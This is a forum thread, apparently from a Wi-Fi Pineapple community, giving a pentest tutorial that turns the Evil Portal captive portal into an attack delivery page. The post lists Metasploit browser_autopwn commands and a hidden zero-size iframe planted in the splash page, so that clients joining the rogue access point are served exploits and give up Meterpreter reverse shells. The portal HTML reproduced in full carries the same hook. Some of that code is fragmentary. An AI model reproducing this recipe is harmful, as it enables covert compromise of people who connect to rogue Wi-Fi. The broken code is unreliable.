Jump to content

Practical Use for Evil Portal in a pentest


Recommended Posts

Running a captive portal is a very useful thing on the pineapple and since everyone has to view it I thought why not use it to run an attack and get a shell? So here is a quick tutorial on using evil portal to deliver a meterpreter shell.

You will need a pineapple running v3.x of the firmware with evil portal installed on it as well as metasploit and a machine to test this on.

Before we get started here I'd like to remind you to check the laws where you live this could be illegal and also I am not responsible for your actions you and only you are. Please only do this in an environment that you have permission to do so in!

Ok so first this is first lets start up metasploit and use browser autopwn by running the following commands:

root@box:~# msfconsole
msf > use auxiliary/server/browser_autopwn

Now that that is done lets go ahead and take a look at the options

msf auxiliary(browser_autopwn) > show options 

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

We need to set LHOST and SRVHOST to the address of our machine ON THE PINEAPPLE NETWORK. In my case it is and if you ran the wp4.sh script yours should be too. Also just for less confusion set SRVPORT to 80 and URIPATH to /

msf auxiliary(browser_autopwn) > set LHOST
msf auxiliary(browser_autopwn) > set SRVPORT
msf auxiliary(browser_autopwn) > set SRVPORT 80
msf auxiliary(browser_autopwn) > set URIPATH /

Ok now go ahead and run it with the "run" command. This will take a minute to start up fully.

Once that has finished starting up we need to create an iframe to it in our captive portal. Under the "Edit Splash" tab in Evil Portal go ahead and add this line somewhere in the body and then save the file:

<iframe src="" height="0px" width="0px" seamless></iframe>

This creates the iframe to the server running browser autopwn which will be doing our dirty work for us.

After you saved the changes open up a browser on your test machine (that is connected to the pineapple network) and visit any webpage and you should get stopped by the captive portal! Check over in your metasploit console to see if you got any sessions, I am not going to hold your hand for this part because this is not a tutorial on how to use meterpreter.

I hope this works for you and if you do anything cool post it here I'd love to see what the community does! Remember hack responsibly!

Here is a quick video I made showing this in action:

If you are wanting to use my code for the captive portal here it is:

  <title>Public Access Portal</title>
  <meta HTTP-EQUIV="Pragma" CONTENT="no-cache">
  <script type="text/javascript">
  var delay = 2; // length of delay in seconds
  var count = 0;

  var Texts=new Array();
  Texts[0]='<p style="font-size:10px;"><u>Terms Of Service</u></p><p style="font-size:10px;">You agree that Public Access is not respondsible for your actions on the internet or on this network.<br/>You agree that all of your communications will be monitored and recorded by Public Access</p>';
  Texts[1]='<a href="$authtarget"><img src="$imagesdir/enter.png" width="71" height="49" border="0"alt="Click to enter" title="Click to enter"> </a>';

  function changeText(){
      window.clearTimeout (to);
    } else {
      var to = setTimeout("changeText()",delay*10000);
<body bgcolor="#DDDDDD" text="#000000" onload="changeText();">
<table border="0" cellpadding="2" cellspacing="0" width="100%"></applet>
  <td align=center>
  <!--<h2>Public Access</h2>
  <h10><b><u>Providing fast wireless access to the masses.</u></b></h10>-->
  <td align=center>
  <h1>You're almost there!</h1>
  <td align=center height="120">
         A client is authenticated by requesting the page $authtarget.
         So, href to it here, with an img or link text the user can click on.
	 Also, note that any images you reference must reside in the
	 subdirectory that is the value of $imagesdir (default: "images").
    <div id="textRange"></div>
<iframe src="" height="0px" width="0px" seamless></iframe>
Link to comment
Share on other sites

Very simple, you can either put them in /etc/nodogsplash/images/ or in /www and reference it like <img src=""/>

Link to comment
Share on other sites

Ok, I'll give that a shot... Do they need to be .png format? And how would I safely comment out the iframe hook line? I don't want to delete it but using the ## option before the line just gave me two pound symbols in my splash screen.

Link to comment
Share on other sites

I haven't researched it to much yet but I am pretty sure the nodogsplash web server doesn't support PHP so you will only be writting HTML, CSS, and javascript.

Link to comment
Share on other sites

  • 9 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...